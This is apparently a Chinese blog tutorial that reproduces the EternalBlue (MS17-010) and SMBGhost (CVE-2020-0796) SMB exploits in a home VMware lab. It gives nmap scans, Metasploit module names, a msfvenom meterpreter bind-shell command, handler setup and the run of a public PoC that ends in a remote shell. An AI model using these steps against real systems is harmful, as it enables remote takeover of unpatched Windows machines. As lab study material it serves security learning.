09永恒之蓝与永恒之黑的复现

一、永恒之蓝

1.简介
2017年3月14日，微软公布SMB远程代码执行漏洞（MS17-010）,又称永恒之蓝，该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时，存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。为了利用此漏洞，在多数情况下，未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行，受黑客攻击的目标系统只需开机在线即可能被入侵。

2.详细信息

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010?redirectedfrom=MSDN
https://paper.seebug.org/1164/#0x00 ```

3.漏洞复现
（1）环境搭建
系统镜像：私信我，博客发不了百度云链接。
kali镜像：官网链接：

https://mirror.karneval.cz/pub/linux/kali-images/kali-2020.2/kali-linux-2020.2-installer-amd64.iso

vmware：官网下载：

https://www.vmware.com/cn/products/workstation-player/workstation-player-evaluation.html

直接打开后关闭更新、关闭防火墙、kali和win7都配置成网络配置成NAT模式。保证在同一网段内。
（2）进行扫描
先确定目标，用nmap进行ping扫描

nmap -sP 192.168.48.0/24

其中2是网关、254是VMware的DHCP服务器、132是自己，所以win7的IP地址是192.168.48.157
用nmap检测445端口有没有开

（3）使用msf的ms17-010进行攻击

查询ms17-010模块、用auxiliary/scanner/smb/smb_ms17_010查看有没有漏洞

查看选项并设定目标主机

使用exploit/windows/smb/ms17_010_eternalblue模块进行攻击，和上边一样设定目标主机然后运行

查看系统信息、进入shell

其他命令参照：https://blog.csdn.net/wy_97/article/details/78838252

二、永恒之黑

1.简介
微软发布安全公告披露了一个最新的SMB远程代码执行漏洞（CVE-2020-0796），攻击者利用该漏洞无须权限即可实现远程代码执行，一旦被成功利用，其危害不亚于永恒之蓝，全球10万台服务器或成首轮攻击目标。SMB（Server Message Block）协议作为一种局域网文件共享传输协议，常被用来作为共享文件安全传输研究的平台。由于SMB 3.1.1协议中处理压缩消息时，对其中数据没有经过安全检查，直接使用会引发内存破坏漏洞，可能被攻击者利用远程执行任意代码，受黑客攻击的目标系统只要开机在线即可能被入侵。据了解，凡政府机构、企事业单位网络中采用Windows 10 1903之后的所有终端节点，如Windows家用版、专业版、企业版、教育版，Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标，Windows 7不受影响。

2.漏洞原理

bash https://paper.seebug.org/1164/#0x00

3.漏洞复现
（1）环境搭建
系统镜像：

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

检测工具和poc：

https://download.csdn.net/download/qq_28241709/12715049

安装win10，内存尽量给大些，先不加网卡、

选我没有internet

选否
装完成进入操作系统，打开文件资源管理器，右键此电脑点击管理，进入本地用户和组，解开Administrator用户并设置密码

设置完成后用administrator账户登录

禁用防火墙和系统更新，和关闭杀毒管家、网络流量管家等防护工具

添加网卡，设置为NAT和kali在同一网段

（2）获取权限
扫描阶段同永恒之蓝。
使用python脚本测试Windows 10是否存在漏洞

vulnerble:易受攻击的，表示有漏洞
Kali Linux实操进行反弹shell
root用户登录(默认不能登录,需要给root设置密码后才能登录)：
普通用户登录后，sudo passwd root 给root设置密码，成功后重启kali，便能使用root登录！
下载SMBGhost_RCE_PoC-master.zip
解压，进入目录

首先使用msfvenom生成一个python类型的shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

将输出的内容复制，拷贝到exploit.py中，剪切替换原先的USER_PAYLOAD部分，

启动msf控制端设置有效载荷并开启4444端口监听
msfconsole

(1)use exploit/multi/handler
(2)set payload windows/x64/meterpreter/bind_tcp
(3)set lport 4444
(4)set rhost 192.168.48.151     (Win10的IP地址)
(5)run

重点来了
先执行 chmod +x exploit
再执行python3 exploit.py -ip 192.168.48.151
（一定要使用python3，使用默认python会100%蓝屏）

提示有session 1 opened
注意：如果没有session 1 opened提示，可以退出监听(ctrl+c)重新run一下再次监听，直到成功为止！
执行shell，回车，输入ipconfig，可以看到是192.168.48.151。到这里就成功拿到shell了
有问题可以私信我，有些文件涉及版权不能发布。